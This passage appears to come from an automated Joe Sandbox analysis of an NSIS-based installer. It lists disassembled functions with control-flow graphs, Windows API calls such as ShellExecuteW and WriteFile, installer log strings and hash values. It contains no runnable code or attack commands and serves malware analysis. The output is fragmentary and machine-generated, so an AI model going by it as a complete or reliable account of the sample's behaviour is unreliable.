                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                          • String ID: FarmFolk$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                          • API String ID: 4286501637-3866668
                                                                          • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                          • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                          Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00403598
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                          Strings
                                                                          • Inst, xrefs: 0040366C
                                                                          • Null, xrefs: 0040367E
                                                                          • Error launching installer, xrefs: 004035D7
                                                                          • soft, xrefs: 00403675
                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                          • API String ID: 4283519449-527102705
                                                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                          Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 004033E7
                                                                          • GetTickCount.KERNEL32 ref: 00403464
                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                          • wsprintfW.USER32 ref: 004034A4
                                                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                          • String ID: ... %d%%$P1B$X1C$X1C
                                                                          • API String ID: 651206458-1535804072
                                                                          • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                          • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                          Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                                                          APIs
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • GlobalFree.KERNELBASE(007A1CE8), ref: 00402387
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FreeGloballstrcpyn
                                                                          • String ID: Exch: stack < %d elements$FarmFolk$Pop: stack empty
                                                                          • API String ID: 1459762280-262958340
                                                                          • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                          • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                          Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                                                          APIs
                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                          • GlobalFree.KERNELBASE(007A1CE8), ref: 00402387
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                          • String ID:
                                                                          • API String ID: 3376005127-0
                                                                          • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                          • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                          Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                          • String ID:
                                                                          • API String ID: 2568930968-0
                                                                          • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                          • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                          Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 625 402713-40273b call 406009 * 2 630 402746-402749 625->630 631 40273d-402743 call 40145c 625->631 633 402755-402758 630->633 634 40274b-402752 call 40145c 630->634 631->630 635 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 633->635 636 40275a-402761 call 40145c 633->636 634->633 636->635
                                                                          APIs
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                          • String ID: <RM>$FarmFolk$WriteINIStr: wrote [%s] %s=%s in %s
                                                                          • API String ID: 247603264-3578718010
                                                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                          Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 732 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 743 402223-4030f2 call 4062a3 732->743 744 40220d-40221b call 4062a3 732->744 744->743
                                                                          APIs
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                          • API String ID: 3156913733-2180253247
                                                                          • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                          • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                          Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 752 405e7f-405e8b 753 405e8c-405ec0 GetTickCount GetTempFileNameW 752->753 754 405ec2-405ec4 753->754 755 405ecf-405ed1 753->755 754->753 757 405ec6 754->757 756 405ec9-405ecc 755->756 757->756
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: nsa
                                                                          • API String ID: 1716503409-2209301699
                                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                          Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 758 4078c5-4078cb 759 4078d0-4078eb 758->759 760 4078cd-4078cf 758->760 761 407aeb-407aff 759->761 762 407bad-407bba 759->762 760->759 764 407b01-407b17 761->764 765 407b19-407b2c 761->765 763 407be7-407beb 762->763 766 407c4a-407c5d 763->766 767 407bed-407c0c 763->767 768 407b33-407b3a 764->768 765->768 771 407c65-407c68 766->771 772 407c25-407c39 767->772 773 407c0e-407c23 767->773 769 407b61-407b64 768->769 770 407b3c-407b40 768->770 769->771 774 407b46-407b5e 770->774 775 407ccd-407cd4 770->775 779 407350 771->779 780 407cec 771->780 776 407c3c-407c43 772->776 773->776 774->769 778 407cdd-407cea 775->778 781 407be1-407be4 776->781 782 407c45 776->782 783 407cef-407cf6 778->783 784 407357-40735b 779->784 785 40749b-4074b6 779->785 786 40746d-407471 779->786 787 4073ff-407403 779->787 780->783 781->763 789 407cd6 782->789 790 407bc6-407bde 782->790 784->778 792 407361-40736e 784->792 785->761 793 407c76-407c7d 786->793 794 407477-40748b 786->794 795 407409-407420 787->795 796 407c6d-407c74 787->796 789->778 790->781 792->780 797 407374-4073ba 792->797 793->778 798 40748e-407496 794->798 799 407423-407427 795->799 796->778 801 4073e2-4073e4 797->801 802 4073bc-4073c0 797->802 798->786 803 407498 798->803 799->787 800 407429-40742f 799->800 804 407431-407438 800->804 805 407459-40746b 800->805 808 4073f5-4073fd 801->808 809 4073e6-4073f3 801->809 806 4073c2-4073c5 GlobalFree 802->806 807 4073cb-4073d9 GlobalAlloc 802->807 803->785 810 407443-407453 GlobalAlloc 804->810 811 40743a-40743d GlobalFree 804->811 805->798 806->807 807->780 812 4073df 807->812 808->799 809->808 809->809 810->780 810->805 811->810 812->801
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                          Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
